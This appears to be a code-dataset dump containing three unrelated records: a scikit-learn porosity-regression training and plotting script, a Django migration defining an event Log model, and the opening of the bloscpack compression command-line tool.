predDf = pd.DataFrame(predNPArray, columns=dfColumnsExport)
predDf.to_csv(f'{pathToSaveModelEval}/predictions.csv',
sep=';',
decimal='.',
index=False)
r2Result, mseResult, maeResult = compute_metrics(yArray, yHatArray)
textToPlot = f'{model_name}\n' \
f'R2: {r2Result:7.4f}\n' \
f'MSE: {mseResult:7.4f}\n' \
f'MAE: {maeResult:7.4f}'
scores['yHat'] = yHatArray
scores['y'] = yArray
scores['R2'] = r2Result
scores['MSE'] = mseResult
scores['MAE'] = maeResult
scores['modelName'] = model_name
print(textToPlot)
return scores
def computes_YHat(cv_scores,
path_to_save_models=None,
model_name=None):
'''
Uses all the estimators from LOOCV to make yHat estimations
Parameters:
cv_scores (DataFrame): The return from a cross validation
path_to_save_models (String): Path to save model dump
model_name (String): Name of the model
Returns:
y, y_hat (NumpyArray, NumpyArray): Ground Truth and Prediction
'''
resultList = cv_scores['estimator']
cross_val_indexes = getKfoldIndexes()
y_hat = []
y = []
# index of the for loop
i = 0
for est in resultList:
x_temp = cross_val_indexes[i][1]
if len(x_temp) > 0:
ground_truth = Y[x_temp]
x_temp = X[x_temp]
pred = est.predict(x_temp)
y_hat = y_hat + list(pred)
y = y + list(ground_truth.reshape(1, -1)[0])
dump(
est, f'{path_to_save_models}/{model_name}_LOOCV_FOLD_{i}.joblib')
else:
print('Problem in estimation')
i = i + 1
y = mmY.inverse_transform(
np.asarray(y).reshape(-1, 1))
y_hat = mmY.inverse_transform(np.asarray(y_hat).reshape(-1, 1))
return y, y_hat
def compute_metrics(y_array, y_hat_array):
'''
Returns metrics for the estimations passed as arguments.
Parameters:
y_array (NumpyArray): Ground Truth
y_hat_array (NumpyArray): Model Estimations
Returns:
(mae, r2, mse) (float, float, float): Metrics calculated
'''
mae = mean_absolute_error(y_array, y_hat_array)
r2 = r2_score(y_array, y_hat_array)
mse = mean_squared_error(y_array, y_hat_array)
return r2, mse, mae
def create_graphs(y_array, y_hat_array,
model_name, path_save_evaluation=None):
'''
Creates scatter and residual plot of predictions passed in the
first two parameters.
Parameters:
y_array (NumpyArray): Ground Truth value
y_hat_array (NumpyArray): Estimated Values
model_name (String): Name of the models
path_save_evaluation (String): Path to save graphs and
metrics
Returns:
None
'''
plt.clf()
plt.style.use(['seaborn-ticks'])
plt.figure(figsize=(6.5, 4.1)) # 4.75))
# Plots the estimatives
plt.plot(y_array, y_hat_array, "o")
# Plots a black line for comparation purpose
_, xmax = plt.xlim()
plt.plot([0, xmax], [0, xmax], 'k-')
y0, ymax = plt.ylim()
yDistanceY0_yMax = ymax - y0
# Plots a linear fit between prediction and actual value
linear = LinearRegression()
linear.fit(y_array, y_hat_array)
plt.plot(y_array, linear.predict(y_array), '-', color='red')
r2, mse, mae = compute_metrics(y_array, y_hat_array)
residual_array = y_array - y_hat_array
text_to_plot = f'R2: {r2:7.4f}\n' \
f'MSE: {mse:7.4f}\n' \
f'MAE: {mae:7.4f}'
print(text_to_plot)
plt.text(0, ymax - yDistanceY0_yMax * 0.2,
text_to_plot,
bbox=dict(facecolor='gray', alpha=0.5),
family='monospace')
# plt.title(modelName)
plt.grid(True)
plt.xlabel('Laboratory Determined Porosity [%]')
plt.ylabel(model_name+' Estimated Porosity [%]')
if path_save_evaluation:
# Save Graph
name_in_graph = model_name.split(' ')[0]
plt.savefig(f'{path_save_evaluation}/scatterPlot{name_in_graph}.png',
bbox_inches='tight', pad_inches=0.01)
# Save file metrics
with open(f'{path_save_evaluation}/metrics.txt',
mode='w') as f:
f.write(f'R2: {r2}\n')
f.write(f'MAE: {mae}\n')
f.write(f'MSE: {mse}\n')
f.write(f'Residuals: {residual_array}\n')
f.write(f'Y: {y_array}\n')
f.write(f'YHat: {y_hat_array}\n')
plt.show()
create_residual_plot(model_name, residual_array,
path_to_save=path_save_evaluation)
def create_residual_plot(model_name,
residual_list,
path_to_save=None):
'''
Creates the residual plot histogram.
Parameters:
model_name (String): Name of the model in the graph
residual_list (NumpyArray): Residuals of the estimation
path_to_save (String): Path to save the residuals graph
Returns:
None
'''
plt.clf()
sns.set(style="ticks")
_, (ax_box, ax_hist) = plt.subplots(2,
sharex=True,
gridspec_kw={
"height_ratios": (.15, .85)},
figsize=(6.5, 4.1))
ax_box.set_xlim((-15, 15))
ax_hist.set_xlim((-15, 15))
ax_hist.set_ylim((0, 13))
ax_hist.set_xlabel(f'{model_name} Porosity Estimation Residual')
ax_hist.set_ylabel('Frequency')
customBins = np.arange(-15.5, 15.5, 1)
ax_hist.set_yticks(np.arange(0, 14, 1))
ax_hist.set_xticks(np.arange(-15, 16, 3))
sns.boxplot(x=residual_list, ax=ax_box)
sns.histplot(data=residual_list,
bins=customBins,
kde=False, ax=ax_hist, legend=False, edgecolor="k", linewidth=1)
ax_box.set(yticks=[])
sns.despine(ax=ax_hist)
sns.despine(ax=ax_box, left=True)
if path_to_save is not None:
name_in_graph = model_name.split(' ')[0]
plt.savefig(f'{path_to_save}/residualsPlot{name_in_graph}.png',
bbox_inches='tight', pad_inches=0.01)
plt.show()
def grid_search_hyperparameters(grid_parameters, model_name, model, save_results=False):
'''
Does a 10 repetition 10-fold cross validation grid search to
select the best model in the parameter grid
Parameters:
grid_parameters (Dictionary): Grid parameters to use
in the model search
model_name (String): Name of the model in the graph
model (sklearn.model): Algorithm to use to train
the model
save_results (bool): Save LOOCV results to a file
Returns:
best_params (Dictionary): Best parameters
'''
cv = RepeatedKFold(
n_splits=10, n_repeats=10, random_state=0
)
gsCV = GridSearchCV(model,
grid_parameters,
cv=cv,
n_jobs=-1,
scoring='neg_mean_squared_error')
gsCV.fit(X, Y)
results_df = pd.DataFrame(gsCV.cv_results_)
results_df = results_df.sort_values(by=['rank_test_score'])
results_df = (
results_df
.set_index(results_df["params"].apply(
lambda x: "_".join(f'{key}:{val}' for key, val in x.items()))
)
.rename_axis('model')
)
print(results_df[
['rank_test_score', 'mean_test_score', 'std_test_score']
])
if save_results:
results_df.drop('params',
axis=1).to_csv(f'../results/modelTrained/{model_name}/GridSearchCV.csv',
decimal='.',
sep=';')
print(
f'Best {model_name}:\n Score > {gsCV.best_score_}\n Params > {gsCV.best_params_}')
return gsCV.best_params_
# Lasso
grid_parameters = {'alpha': [0.1, 0.01, 0.001, 0.0005, 0.00025, 0.0001, 0.00005],
'max_iter': [100, 1000, 10000, 100000]}
grid_search_hyperparameters(grid_parameters,
'Lasso Reg',
Lasso(),
save_results=True)
# Ridge
grid_parameters = {'alpha': [0.1, 0.01, 0.001, 0.0005, 0.00025, 0.0001, 0.00005],
'max_iter': [100, 1000, 10000, 100000]}
grid_search_hyperparameters(grid_parameters,
'Ridge Reg',
Ridge(),
save_results=True)
# ElasticNet
grid_parameters = {'alpha': [0.1, 0.01, 0.001, 0.0005, 0.00025, 0.0001, 0.00005],
'l1_ratio': [0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1],
'max_iter': [100, 1000, 10000, 100000]}
grid_search_hyperparameters(grid_parameters,
'ElasticNet',
ElasticNet(),
save_results=True)
# kNN
covParam = np.cov(X.astype(np.float32))
invCovParam = np.linalg.pinv(covParam)
grid_parameters = [{'algorithm': ['auto'],
'metric': ['minkowski'],
'n_neighbors': [1, 2, 3, 4, 5]},
{'algorithm': ['brute'],
'metric': ['mahalanobis'],
'n_neighbors': [1, 2, 3, 4, 5],
'metric_params': [{'V': covParam,
'VI': invCovParam}]}]
grid_search_hyperparameters(grid_parameters,
'KNN',
KNeighborsRegressor(),
save_results=True)
# SVR Model
grid_parameters = {'C': [0.1, 1, 10, 100, 1000],
'gamma': ['auto', 5, 1, 0.1, 0.01, 0.001, 0.0001],
'kernel': ['rbf'],
'epsilon': [0.1, 0.01, 0.05]}
grid_search_hyperparameters(grid_parameters,
'SVR',
SVR(),
save_results=True)
# RF
grid_parameters = {'n_estimators': [10, 50, 100, 200, 500],
'criterion': ['mse', 'mae']}
grid_search_hyperparameters(grid_parameters,
'RF',
RandomForestRegressor(),
save_results=True)
# sorted(sklearn.metrics.SCORERS.keys())
# MLP
grid_parameters = {'hidden_layer_sizes': [(5, 5), (15, 10),
(20, 15, 10),
(20, 15, 15, 10),
(10, 5, 5, 5),
(20, 15, 10, 5)],
'activation': ['relu'],
'solver': ['adam'],
'max_iter': [1250, 1600, 2000, 2500, 3000],
'alpha': [0.01, 0.001, 0.0001],
'learning_rate': ['constant', 'adaptive'],
'batch_size': [1, 2, 3],
'learning_rate_init': [0.01, 0.001],
'early_stopping': [False]
}
grid_search_hyperparameters(grid_parameters,
'MLP',
MLPRegressor(),
save_results=True)
###################################
# Training and evaluation of models
# Linear Regression
linear = LinearRegression()
linearEval = evaluate_model(linear, 'Linear Reg', save_results=True)
# Ridge Regression
ridge = Ridge(alpha=0.1, max_iter=100)
ridgeEval = evaluate_model(ridge, 'Ridge Reg', save_results=True)
# Lasso Regression
lasso = Lasso(alpha=0.00025, max_iter=1000)
lassoEval = evaluate_model(lasso, 'Lasso Reg', save_results=True)
# ElasticNet
elasticNet = ElasticNet(alpha=0.00025, l1_ratio=1, max_iter=1000)
elasticNetEval = evaluate_model(elasticNet, 'ElasticNet', save_results=True)
'''
important_coeficients = []
coef = []
for est in elasticNetEval['estimator']:
vec = np.vectorize(lambda x: 0 if x == 0 else 1)
print(vec(est.coef_))
coef.append(est.coef_)
important_coeficients.append(vec(est.coef_))
important_coef_np = np.asfarray(important_coeficients)
coef = np.asarray(coef)
important_columns = vec(important_coef_np.sum(axis=0)).nonzero()[0]
teste = coef[:, important_columns]
plt.boxplot(teste[:, :])
plt.show()
dataset.columns[important_columns]
'''
# KNN Model Evaluation
knn = KNeighborsRegressor(n_neighbors=2,
metric='minkowski')
knnEval = evaluate_model(knn, 'KNN', save_results=True)
# SVR Model Evaluation
svr = SVR(gamma=5,
C=10,
epsilon=0.01,
kernel='rbf')
svrEval = evaluate_model(svr, 'SVR', save_results=True)
# Random Forest
forest = RandomForestRegressor(n_estimators=500,
criterion='mae')
forestEval = evaluate_model(forest, 'RF', save_results=True)
# MLP Model Evaluation
mlp = MLPRegressor(max_iter=3000,
hidden_layer_sizes=(20, 15, 15, 10),
activation='relu',
alpha=0.001,
learning_rate='adaptive',
learning_rate_init=0.001,
batch_size=3,
solver='adam')
mlpEval = evaluate_model(mlp, 'MLP', save_results=True)
# Compile all the predictions in the same CSV file
crossValIndexes = getKfoldIndexes()
crossValIndexes = list(map(lambda x: x[1][0], crossValIndexes))
wavelengthColumns = list(dataset.columns[:-1])
yHatTable = np.concatenate((X[crossValIndexes], linearEval['y'], linearEval['yHat'], ridgeEval['yHat'], lassoEval['yHat'],
lassoEval['yHat'], knnEval['yHat'], svrEval['yHat'], forestEval['yHat'], mlpEval['yHat']),
axis=1)
dfColumnsExport = wavelengthColumns + ['Y', 'Linear', 'Ridge', 'Lasso',
'ElasticNet', 'kNN', 'SVR', 'RF', 'MLP']
yHatDf = pd.DataFrame(yHatTable, columns=dfColumnsExport)
yHatDf.to_csv('../results/modelTrained/completePredictions.csv',
sep=';',
decimal='.',
index=False)
indexColumns = ['modelName', 'R2', 'MSE', 'MAE']
summaryDF = pd.DataFrame(
np.asarray(list(map(lambda x: list(map(lambda index: x[index], indexColumns)),
[linearEval, ridgeEval, lassoEval, elasticNetEval,
knnEval, svrEval, forestEval, mlpEval]))),
columns=indexColumns)
summaryDF.to_csv('../results/modelTrained/summary.csv',
sep=';',
decimal='.',
index=False)
def plot_results():
models = ['Linear Reg', 'Lasso Reg', 'Ridge Reg',
'ElasticNet', 'KNN', 'SVR', 'RF', 'MLP']
for model_name in models:
path_model_data = f'../results/modelTrained/{model_name}'
path_prediction_file = f'{path_model_data}/predictions.csv'
df_prediction_data = pd.read_csv(
path_prediction_file, decimal='.', sep=';')
yArray = df_prediction_data['Y'].values.reshape(-1, 1)
yHatArray = df_prediction_data['YHat'].values.reshape(-1, 1)
create_graphs(yArray, yHatArray, model_name,
path_save_evaluation=path_model_data)
plot_results() | en | 0.613491 | # Import the data # Auxiliary Functions Evaluates the model using LOOCV and creates a file with the results. Parameters: model (sklearn.model): Sklearn model model_name (int): Name of the algorithm save_results (bool): save results to a file Returns: scores (DataFrame): Results of LOOCV # Setup directory to save results # Creates the directory to save the results Uses all the estimators from LOOCV to make yHat estimations Parameters: cv_scores (DataFrame): The return from a cross validation path_to_save_models (String): Path to save model dump model_name (String): Name of the model Returns: y, y_hat (NumpyArray, NumpyArray): Ground Truth and Prediction # index of the for loop Returns metrics for the estimations passed as arguments. Parameters: y_array (NumpyArray): Ground Truth y_hat_array (NumpyArray): Model Estimations Returns: (mae, r2, mse) (float, float, float): Metrics calculated Creates scatter and residual plot of predictions passed in the first two parameters. Parameters: y_array (NumpyArray): Ground Truth value y_hat_array (NumpyArray): Estimated Values model_name (String): Name of the models path_save_evaluation (String): Path to save graphs and metrics Returns: None # 4.75)) # Plots the estimatives # Plots a black line for comparation purpose # Plots a linear fit between prediction and actual value # plt.title(modelName) # Save Graph # Save file metrics Creates the residual plot histogram. Parameters: model_name (String): Name of the model in the graph residual_list (NumpyArray): Residuals of the estimation path_to_save (String): Path to save the residuals graph Returns: None Does a 10 repetition 10-fold cross validation grid search to select the best model in the parameter grid Parameters: grid_parameters (Dictionary): Grid parameters to use in the model search model_name (String): Name of the model in the graph model (sklearn.model): Algorithm to use to train the model save_results (bool): Save LOOCV results to a file Returns: best_params (Dictionary): Best parameters # Lasso # Ridge # ElasticNet # kNN # SVR Model # RF # sorted(sklearn.metrics.SCORERS.keys()) # MLP ################################### # Training and evaluation of models # Linear Regression # Ridge Regression # Lasso Regression # ElasticNet important_coeficients = [] coef = [] for est in elasticNetEval['estimator']: vec = np.vectorize(lambda x: 0 if x == 0 else 1) print(vec(est.coef_)) coef.append(est.coef_) important_coeficients.append(vec(est.coef_)) important_coef_np = np.asfarray(important_coeficients) coef = np.asarray(coef) important_columns = vec(important_coef_np.sum(axis=0)).nonzero()[0] teste = coef[:, important_columns] plt.boxplot(teste[:, :]) plt.show() dataset.columns[important_columns] # KNN Model Evaluation # SVR Model Evaluation # Random Forest # MLP Model Evaluation # Compile all the predictions in the same CSV file | 2.557662 | 3 |
cla_backend/apps/cla_eventlog/migrations/0001_initial.py | uk-gov-mirror/ministryofjustice.cla_backend | 3 | 6632506 | <gh_stars>1-10
# coding=utf-8
from __future__ import unicode_literals
from django.conf import settings
from django.db import models, migrations
import django.utils.timezone
import jsonfield.fields
import model_utils.fields
class Migration(migrations.Migration):
dependencies = [
("legalaid", "0001_initial"),
("timer", "0001_initial"),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name="Log",
fields=[
("id", models.AutoField(verbose_name="ID", serialize=False, auto_created=True, primary_key=True)),
(
"created",
model_utils.fields.AutoCreatedField(
default=django.utils.timezone.now, verbose_name="created", editable=False
),
),
(
"modified",
model_utils.fields.AutoLastModifiedField(
default=django.utils.timezone.now, verbose_name="modified", editable=False
),
),
("code", models.CharField(max_length=50)),
("type", models.CharField(max_length=20, choices=[(b"outcome", b"outcome"), (b"system", b"system")])),
(
"level",
models.PositiveSmallIntegerField(choices=[(29, b"HIGH"), (21, b"MODERATE"), (11, b"MINOR")]),
),
("notes", models.TextField(null=True, blank=True)),
("patch", jsonfield.fields.JSONField(null=True, blank=True)),
(
"context",
jsonfield.fields.JSONField(
help_text=b"Field to store extra event data for reporting", null=True, blank=True
),
),
("case", models.ForeignKey(to="legalaid.Case")),
("created_by", models.ForeignKey(to=settings.AUTH_USER_MODEL)),
("timer", models.ForeignKey(blank=True, to="timer.Timer", null=True)),
],
options={"ordering": ("-created",)},
bases=(models.Model,),
)
]
| # coding=utf-8
from __future__ import unicode_literals
from django.conf import settings
from django.db import models, migrations
import django.utils.timezone
import jsonfield.fields
import model_utils.fields
class Migration(migrations.Migration):
dependencies = [
("legalaid", "0001_initial"),
("timer", "0001_initial"),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name="Log",
fields=[
("id", models.AutoField(verbose_name="ID", serialize=False, auto_created=True, primary_key=True)),
(
"created",
model_utils.fields.AutoCreatedField(
default=django.utils.timezone.now, verbose_name="created", editable=False
),
),
(
"modified",
model_utils.fields.AutoLastModifiedField(
default=django.utils.timezone.now, verbose_name="modified", editable=False
),
),
("code", models.CharField(max_length=50)),
("type", models.CharField(max_length=20, choices=[(b"outcome", b"outcome"), (b"system", b"system")])),
(
"level",
models.PositiveSmallIntegerField(choices=[(29, b"HIGH"), (21, b"MODERATE"), (11, b"MINOR")]),
),
("notes", models.TextField(null=True, blank=True)),
("patch", jsonfield.fields.JSONField(null=True, blank=True)),
(
"context",
jsonfield.fields.JSONField(
help_text=b"Field to store extra event data for reporting", null=True, blank=True
),
),
("case", models.ForeignKey(to="legalaid.Case")),
("created_by", models.ForeignKey(to=settings.AUTH_USER_MODEL)),
("timer", models.ForeignKey(blank=True, to="timer.Timer", null=True)),
],
options={"ordering": ("-created",)},
bases=(models.Model,),
)
] | en | 0.644078 | # coding=utf-8 | 1.803782 | 2 |
bloscpack/cli.py | sachk/bloscpack | 87 | 6632507 | <filename>bloscpack/cli.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim :set ft=py:
import argparse
from os import path
import json
import pprint
import blosc
from .args import (BloscArgs,
BloscpackArgs,
MetadataArgs,
)
from .append import (append,
_seek_to_metadata,
_rewrite_metadata_fp
)
from .checksums import (CHECKSUMS_AVAIL,
)
from .constants import (SUFFIXES,
CNAME_AVAIL,
EXTENSION,
MIN_CLEVEL,
MAX_CLEVEL,
)
from .defaults import (DEFAULT_TYPESIZE,
DEFAULT_CLEVEL,
DEFAULT_SHUFFLE,
DEFAULT_CNAME,
DEFAULT_CHUNK_SIZE,
DEFAULT_CHECKSUM,
DEFAULT_OFFSETS,
)
from .exceptions import (FileNotFound,
ChunkingException,
FormatVersionMismatch,
ChecksumMismatch,
)
from .file_io import (pack_file_to_file,
unpack_file_from_file,
_read_beginning,
_read_compressed_chunk_fp,
)
from .headers import (decode_blosc_flags,
)
from .pretty import (reverse_pretty,
join_with_eol,
)
from .version import __version__
from . import log
def check_files(in_file, out_file, args):
""" Check files exist/don't exist.
Parameters
----------
in_file : str:
the input file
out_file : str
the output file
args : parser args
any additional arguments from the parser
Raises
------
FileNotFound
in case any of the files isn't found.
"""
if not path.exists(in_file):
raise FileNotFound("input file '%s' does not exist!" % in_file)
if path.exists(out_file):
if not args.force:
raise FileNotFound("output file '%s' exists!" % out_file)
else:
log.verbose("overwriting existing file: '%s'" % out_file)
log.verbose("input file is: '%s'" % in_file)
log.verbose("output file is: '%s'" % out_file)
def _blosc_args_from_args(args):
return BloscArgs(typesize=args.typesize,
clevel=args.clevel,
shuffle=args.shuffle,
cname=args.cname,
)
def process_compression_args(args):
""" Extract and check the compression args after parsing by argparse.
Parameters
----------
args : argparse.Namespace
the parsed command line arguments
Returns
-------
in_file : str
the input file name
out_file : str
the out_file name
blosc_args : tuple of (int, int, bool)
typesize, clevel and shuffle
"""
in_file = args.in_file
out_file = args.out_file or in_file + EXTENSION
return in_file, out_file, _blosc_args_from_args(args)
def process_decompression_args(args):
""" Extract and check the decompression args after parsing by argparse.
Warning: may call sys.exit()
Parameters
----------
args : argparse.Namespace
the parsed command line arguments
Returns
-------
in_file : str
the input file name
out_file : str
the out_file name
"""
in_file = args.in_file
out_file = args.out_file
# remove the extension for output file
if args.no_check_extension:
if out_file is None:
log.error('--no-check-extension requires use of <out_file>')
else:
if in_file.endswith(EXTENSION):
out_file = args.out_file or in_file[:-len(EXTENSION)]
else:
log.error("input file '%s' does not end with '%s'" %
(in_file, EXTENSION))
return in_file, out_file
def process_append_args(args):
original_file = args.original_file
new_file = args.new_file
if not args.no_check_extension and not original_file.endswith(EXTENSION):
log.error("original file '%s' does not end with '%s'" %
(original_file, EXTENSION))
return original_file, new_file
def process_metadata_args(args):
if args.metadata is not None:
try:
with open(args.metadata, 'r') as metadata_file:
return json.loads(metadata_file.read().strip())
except IOError as ioe:
log.error(ioe.message)
def process_nthread_arg(args):
""" Extract and set nthreads. """
if args.nthreads != blosc.ncores:
blosc.set_nthreads(args.nthreads)
log.verbose('using %d thread%s' %
(args.nthreads, 's' if args.nthreads > 1 else ''))
def log_metadata(metadata):
log.normal("Metadata:")
log.normal(pprint.pformat(metadata, width=90))
class BloscPackCustomFormatter(argparse.HelpFormatter):
""" Custom HelpFormatter.
Basically a combination and extension of ArgumentDefaultsHelpFormatter and
RawTextHelpFormatter. Adds default values to argument help, but only if the
default is not in [None, True, False]. Also retains all whitespace as it
is.
"""
def _get_help_string(self, action):
help_ = action.help
if '%(default)' not in action.help \
and action.default not in \
[argparse.SUPPRESS, None, True, False]:
defaulting_nargs = [argparse.OPTIONAL, argparse.ZERO_OR_MORE]
if action.option_strings or action.nargs in defaulting_nargs:
help_ += ' (default: %(default)s)'
return help_
def _split_lines(self, text, width):
return text.splitlines()
def _fill_text(self, text, width, indent):
return ''.join([indent + line for line in text.splitlines(True)])
def _inject_blosc_group(parser):
blosc_group = parser.add_argument_group(title='blosc settings')
blosc_group.add_argument('-t', '--typesize',
metavar='<size>',
default=DEFAULT_TYPESIZE,
type=int,
help='typesize for blosc')
blosc_group.add_argument('-l', '--clevel',
default=DEFAULT_CLEVEL,
choices=range(MIN_CLEVEL, MAX_CLEVEL+1),
metavar='[0, 9]',
type=int,
help='compression level')
blosc_group.add_argument('-s', '--no-shuffle',
action='store_false',
default=DEFAULT_SHUFFLE,
dest='shuffle',
help='deactivate shuffle')
blosc_group.add_argument('-c', '--codec',
metavar='<codec>',
type=str,
choices=CNAME_AVAIL,
default=DEFAULT_CNAME,
dest='cname',
help="codec to be used by Blosc: \n%s"
% join_with_eol(CNAME_AVAIL))
def create_parser():
""" Create and return the parser. """
parser = argparse.ArgumentParser(
#usage='%(prog)s [GLOBAL_OPTIONS] (compress | decompress)
# [COMMAND_OPTIONS] <in_file> [<out_file>]',
description='command line de/compression with blosc',
formatter_class=BloscPackCustomFormatter,
epilog="Additional help for subcommands is available:\n"+
" %(prog)s 'subcommand' [ -h | --help ]")
## print version of bloscpack, python-blosc and blosc itself
version_str = "bloscpack: '%s' " % __version__ + \
"python-blosc: '%s' " % blosc.version.__version__ + \
"blosc: '%s'" % blosc.BLOSC_VERSION_STRING
parser.add_argument('--version', action='version', version=version_str)
output_group = parser.add_mutually_exclusive_group()
output_group.add_argument('-v', '--verbose',
action='store_true',
default=False,
help='be verbose about actions')
output_group.add_argument('-d', '--debug',
action='store_true',
default=False,
help='print debugging output too')
global_group = parser.add_argument_group(title='global options')
global_group.add_argument('-f', '--force',
action='store_true',
default=False,
help='disable overwrite checks for existing files\n' +
'(use with caution)')
class CheckThreadOption(argparse.Action):
def __call__(self, parser, namespace, value, option_string=None):
if not 1 <= value <= blosc.BLOSC_MAX_THREADS:
log.error('%s must be 1 <= n <= %d'
% (option_string, blosc.BLOSC_MAX_THREADS))
setattr(namespace, self.dest, value)
global_group.add_argument('-n', '--nthreads',
metavar='[1, %d]' % blosc.BLOSC_MAX_THREADS,
action=CheckThreadOption,
default=blosc.ncores,
type=int,
dest='nthreads',
help='set number of threads, ' +
'(default: %(default)s (ncores))')
subparsers = parser.add_subparsers(title='subcommands',
metavar='',
dest='subcommand')
compress_parser = subparsers.add_parser('compress',
formatter_class=BloscPackCustomFormatter,
help='perform compression on file')
c_parser = subparsers.add_parser('c',
formatter_class=BloscPackCustomFormatter,
help="alias for 'compress'")
class CheckChunkSizeOption(argparse.Action):
def __call__(self, parser, namespace, value, option_string=None):
if value == 'max':
value = blosc.BLOSC_MAX_BUFFERSIZE
else:
try:
# try to get the value as bytes
if value[-1] in SUFFIXES.keys():
value = reverse_pretty(value)
# seems to be intended to be a naked int
else:
value = int(value)
except ValueError as ve:
log.error('%s error: %s' % (option_string, str(ve)))
if value < 0:
log.error('%s must be > 0' % option_string)
setattr(namespace, self.dest, value)
for p in [compress_parser, c_parser]:
_inject_blosc_group(p)
bloscpack_group = p.add_argument_group(title='bloscpack settings')
bloscpack_group.add_argument('-z', '--chunk-size',
metavar='<size>',
action=CheckChunkSizeOption,
type=str,
default=DEFAULT_CHUNK_SIZE,
dest='chunk_size',
help="set desired chunk size or 'max'")
checksum_format = join_with_eol(CHECKSUMS_AVAIL[0:3]) + \
join_with_eol(CHECKSUMS_AVAIL[3:6]) + \
join_with_eol(CHECKSUMS_AVAIL[6:])
checksum_help = 'set desired checksum:\n' + checksum_format
bloscpack_group.add_argument('-k', '--checksum',
metavar='<checksum>',
type=str,
choices=CHECKSUMS_AVAIL,
default=DEFAULT_CHECKSUM,
dest='checksum',
help=checksum_help)
bloscpack_group.add_argument('-o', '--no-offsets',
action='store_false',
default=DEFAULT_OFFSETS,
dest='offsets',
help='deactivate offsets')
bloscpack_group.add_argument('-m', '--metadata',
metavar='<metadata>',
type=str,
dest='metadata',
help="file containing the metadata, must contain valid JSON")
decompress_parser = subparsers.add_parser('decompress',
formatter_class=BloscPackCustomFormatter,
help='perform decompression on file')
d_parser = subparsers.add_parser('d',
formatter_class=BloscPackCustomFormatter,
help="alias for 'decompress'")
for p in [decompress_parser, d_parser]:
p.add_argument('-e', '--no-check-extension',
action='store_true',
default=False,
dest='no_check_extension',
help='disable checking input file for extension (*.blp)\n' +
'(requires use of <out_file>)')
for p, help_in, help_out in [(compress_parser,
'file to be compressed',
'file to compress to'),
(c_parser,
'file to be compressed',
'file to compress to'),
(decompress_parser,
'file to be decompressed',
'file to decompress to'),
(d_parser,
'file to be decompressed',
'file to decompress to'),
]:
p.add_argument('in_file',
metavar='<in_file>',
type=str,
default=None,
help=help_in)
p.add_argument('out_file',
metavar='<out_file>',
type=str,
nargs='?',
default=None,
help=help_out)
append_parser = subparsers.add_parser('append',
formatter_class=BloscPackCustomFormatter,
help='append data to a compressed file')
a_parser = subparsers.add_parser('a',
formatter_class=BloscPackCustomFormatter,
help="alias for 'append'")
for p in (append_parser, a_parser):
_inject_blosc_group(p)
p.add_argument('original_file',
metavar='<original_file>',
type=str,
help="file to append to")
p.add_argument('new_file',
metavar='<new_file>',
type=str,
help="file to append from")
p.add_argument('-e', '--no-check-extension',
action='store_true',
default=False,
dest='no_check_extension',
help='disable checking original file for extension (*.blp)\n')
p.add_argument('-m', '--metadata',
metavar='<metadata>',
type=str,
dest='metadata',
help="file containing the metadata, must contain valid JSON")
info_parser = subparsers.add_parser('info',
formatter_class=BloscPackCustomFormatter,
help='print information about a compressed file')
i_parser = subparsers.add_parser('i',
formatter_class=BloscPackCustomFormatter,
help="alias for 'info'")
for p in (info_parser, i_parser):
p.add_argument('file_',
metavar='<file>',
type=str,
default=None,
help="file to show info for")
return parser
def main():
parser = create_parser()
log.set_prefix(parser.prog)
args = parser.parse_args()
if args.verbose:
log.LEVEL = log.VERBOSE
elif args.debug:
log.LEVEL = log.DEBUG
log.debug('command line argument parsing complete')
log.debug('command line arguments are: ')
for arg, val in sorted(vars(args).items()):
log.debug(' %s: %s' % (arg, str(val)))
process_nthread_arg(args)
# compression and decompression handled via subparsers
if args.subcommand in ['compress', 'c']:
log.verbose('getting ready for compression')
in_file, out_file, blosc_args = process_compression_args(args)
try:
check_files(in_file, out_file, args)
except FileNotFound as fnf:
log.error(str(fnf))
metadata = process_metadata_args(args)
bloscpack_args = BloscpackArgs(offsets=args.offsets,
checksum=args.checksum)
try:
pack_file_to_file(in_file, out_file,
chunk_size=args.chunk_size,
metadata=metadata,
blosc_args=blosc_args,
bloscpack_args=bloscpack_args,
metadata_args=MetadataArgs())
except ChunkingException as ce:
log.error(str(ce))
elif args.subcommand in ['decompress', 'd']:
log.verbose('getting ready for decompression')
in_file, out_file = process_decompression_args(args)
try:
check_files(in_file, out_file, args)
except FileNotFound as fnf:
log.error(str(fnf))
try:
metadata = unpack_file_from_file(in_file, out_file)
if metadata:
log_metadata(metadata)
except FormatVersionMismatch as fvm:
log.error(fvm.message)
except ChecksumMismatch as csm:
log.error(csm.message)
elif args.subcommand in ['append', 'a']:
log.verbose('getting ready for append')
original_file, new_file = process_append_args(args)
try:
if not path.exists(original_file):
raise FileNotFound("original file '%s' does not exist!" %
original_file)
if not path.exists(new_file):
raise FileNotFound("new file '%s' does not exist!" %
new_file)
except FileNotFound as fnf:
log.error(str(fnf))
log.verbose("original file is: '%s'" % original_file)
log.verbose("new file is: '%s'" % new_file)
blosc_args = _blosc_args_from_args(args)
metadata = process_metadata_args(args)
append(original_file, new_file, blosc_args=blosc_args)
if metadata is not None:
with open(original_file, 'r+b') as fp:
_seek_to_metadata(fp)
_rewrite_metadata_fp(fp, metadata)
elif args.subcommand in ('info', 'i'):
try:
if not path.exists(args.file_):
raise FileNotFound("file '%s' does not exist!" %
args.file_)
except FileNotFound as fnf:
log.error(str(fnf))
try:
with open(args.file_, 'rb') as fp:
bloscpack_header, metadata, metadata_header, offsets = \
_read_beginning(fp)
checksum_impl = bloscpack_header.checksum_impl
# get the header of the first chunk
_, blosc_header, _ = _read_compressed_chunk_fp(
fp, checksum_impl)
except ValueError as ve:
log.error(str(ve) + "\n" +
"This might not be a bloscpack compressed file.")
log.normal(bloscpack_header.pformat())
if offsets:
log.normal("'offsets':")
log.normal("[%s,...]" % (",".join(str(o) for o in offsets[:5])))
if metadata is not None:
log_metadata(metadata)
log.normal(metadata_header.pformat())
log.normal("First chunk blosc header:")
log.normal(str(blosc_header))
log.normal("First chunk blosc flags: ")
log.normal(str(decode_blosc_flags(blosc_header['flags'])))
else: # pragma: no cover
# in Python 3 subcommands are not mandatory by default
parser.print_usage()
log.error('too few arguments', 2)
log.verbose('done')
| <filename>bloscpack/cli.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
